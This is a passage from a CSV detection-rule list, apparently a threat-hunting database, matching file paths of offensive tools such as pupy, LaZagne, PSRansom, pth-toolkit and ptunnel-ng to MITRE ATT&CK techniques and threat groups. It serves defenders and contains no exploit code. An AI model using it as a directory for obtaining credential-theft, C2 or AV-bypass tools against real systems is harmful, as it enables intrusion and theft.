TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9988" "*/pspy/cmd*",".{0,1000}\/pspy\/cmd.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9989" "*/pspy/cmd/*",".{0,1000}\/pspy\/cmd\/.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9990" "*/pspy/pspy.go*",".{0,1000}\/pspy\/pspy\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9991" "*/pspy32*",".{0,1000}\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9992" "*/pspy64*",".{0,1000}\/pspy64.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9993" "*/PSRansom -*",".{0,1000}\/PSRansom\s\-.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with 
C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","9994" "*/psscanner.go*",".{0,1000}\/psscanner\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9995" "*/psscanner/psscanner.go*",".{0,1000}\/psscanner\/psscanner\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9996" "*/PSSW100AVB*",".{0,1000}\/PSSW100AVB.{0,1000}","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1112 - T1562.001 - T1086 - T1548.002 - T1059.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","N/A","10","1104","174","2025-01-28T10:47:44Z","2021-10-08T17:36:24Z","9997" "*/pswRecovery4Moz.txt*",".{0,1000}\/pswRecovery4Moz\.txt.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","9998" "*/pth-toolkit.git*",".{0,1000}\/pth\-toolkit\.git.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","9999" "*/ptunnel-ng*",".{0,1000}\/ptunnel\-ng.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","10000" "*/puckiestyle/CVE-2022-0847*",".{0,1000}\/puckiestyle\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z","10001" "*/puppet-naivesigning.nse*",".{0,1000}\/puppet\-naivesigning\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10005" "*/pupwinutils/*.py*",".{0,1000}\/pupwinutils\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10006" "*/pupy/*.py*",".{0,1000}\/pupy\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - 
Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10007" "*/pupy/commands/*",".{0,1000}\/pupy\/commands\/.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10008" "*/pupy/external/creddump7*",".{0,1000}\/pupy\/external\/creddump7.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#linux","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10009" 
"*/pupy/memimporter/*",".{0,1000}\/pupy\/memimporter\/.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10010" "*/pupy/output/pupyx64*.exe*",".{0,1000}\/pupy\/output\/pupyx64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10011" "*/pupy/pupygen.py*",".{0,1000}\/pupy\/pupygen\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - 
T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10012" "*/pupy_load.*",".{0,1000}\/pupy_load\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10013" "*/PupyCmd.py*",".{0,1000}\/PupyCmd\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - 
T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10014" "*/PupyCompile.py*",".{0,1000}\/PupyCompile\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10015" "*/pupygen.py*",".{0,1000}\/pupygen\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting 
Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10016" "*/pupylib/payloads/*",".{0,1000}\/pupylib\/payloads\/.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10017" "*/PupyOffload.py*",".{0,1000}\/PupyOffload\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10018" "*/pupyps.py*",".{0,1000}\/pupyps\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation 
framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10019" "*/PupyServer.py*",".{0,1000}\/PupyServer\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10020" "*/PupyService.py*",".{0,1000}\/PupyService\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - 
T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10021" "*/pupysh.py*",".{0,1000}\/pupysh\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10022" "*/pupysh.sh*",".{0,1000}\/pupysh\.sh.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - 
Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#linux","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10023" "*/PupyTriggers.py*",".{0,1000}\/PupyTriggers\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10024" "*/PupyWeb.py*",".{0,1000}\/PupyWeb\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10025" "*/pupyx64.dll*",".{0,1000}\/pupyx64\.dll.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation 
framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10026" "*/pupyx64.exe*",".{0,1000}\/pupyx64\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10027" "*/pupyx64d.exe*",".{0,1000}\/pupyx64d\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 
- T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10028" "*/pupyx86.exe*",".{0,1000}\/pupyx86\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10029" 